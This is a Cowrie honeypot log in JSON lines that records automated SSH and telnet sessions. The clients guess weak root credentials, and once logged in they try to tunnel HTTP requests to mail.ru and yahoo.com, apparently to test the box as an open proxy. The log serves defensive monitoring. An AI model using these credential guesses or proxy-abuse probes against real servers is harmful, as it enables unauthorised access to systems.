{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13731,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6d6b0d40c55","protocol":"ssh","message":"New connection: 77.83.207.83:13731 (1.2.3.4:22) [session: b6d6b0d40c55]","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.657919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.658589Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.708929Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.957875Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30696,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30696","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.008819Z","session":"b6d6b0d40c55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.059562Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":22162,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:22162","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.200402Z","session":"b6d6b0d40c55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.250367Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.login.failed","username":"master","password":"1234567","message":"login attempt [master/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.340429Z","src_ip":"212.227.125.160","session":"d42661988690"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13872,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13872","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.392222Z","session":"b6d6b0d40c55"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.442269Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.492940Z","src_ip":"77.83.207.83","session":"b6d6b0d40c55"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13817,"dst_ip":"1.2.3.4","dst_port":22,"session":"e02fe9725164","protocol":"ssh","message":"New connection: 77.83.207.83:13817 (1.2.3.4:22) [session: e02fe9725164]","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.542033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.552161Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.591879Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.839785Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19482,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19482","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.890773Z","session":"e02fe9725164"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.940724Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.session.closed","duration":12.570558071136475,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:08.957487Z","src_ip":"212.227.235.229","session":"137ba79c88bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":27124,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27124","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.080100Z","session":"e02fe9725164"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.129947Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48502,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a6d1cbe86fc","protocol":"telnet","message":"New connection: 212.227.235.229:48502 (1.2.3.4:23) [session: 7a6d1cbe86fc]","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.168518Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":3253,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3253","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.272002Z","session":"e02fe9725164"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.321616Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.371924Z","src_ip":"77.83.207.83","session":"e02fe9725164"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13900,"dst_ip":"1.2.3.4","dst_port":22,"session":"3aeaa727f923","protocol":"ssh","message":"New connection: 77.83.207.83:13900 (1.2.3.4:22) [session: 3aeaa727f923]","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.422208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.423087Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.473391Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45844,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a31b65833f4","protocol":"ssh","message":"New connection: 212.227.125.160:45844 (1.2.3.4:22) [session: 1a31b65833f4]","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.518560Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.724339Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.749457Z","src_ip":"212.227.125.160","session":"d42661988690"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18667,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:18667","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.775559Z","session":"3aeaa727f923"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.825938Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":9717,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9717","sensor":"my-vps","timestamp":"2025-08-31T03:50:09.968684Z","session":"3aeaa727f923"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.019176Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18518,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18518","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.160742Z","session":"3aeaa727f923"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.211428Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.262632Z","src_ip":"77.83.207.83","session":"3aeaa727f923"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14003,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1a1f9217d17","protocol":"ssh","message":"New connection: 77.83.207.83:14003 (1.2.3.4:22) [session: e1a1f9217d17]","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.311095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.312145Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.362007Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.521111Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.521822Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.610485Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2888,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:2888","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.661053Z","session":"e1a1f9217d17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.710898Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27702,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27702","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.852125Z","session":"e1a1f9217d17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:10.901991Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":32460,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32460","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.044133Z","session":"e1a1f9217d17"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.093951Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.144768Z","src_ip":"77.83.207.83","session":"e1a1f9217d17"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14108,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9924ec13276","protocol":"ssh","message":"New connection: 77.83.207.83:14108 (1.2.3.4:22) [session: f9924ec13276]","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.197373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.198869Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
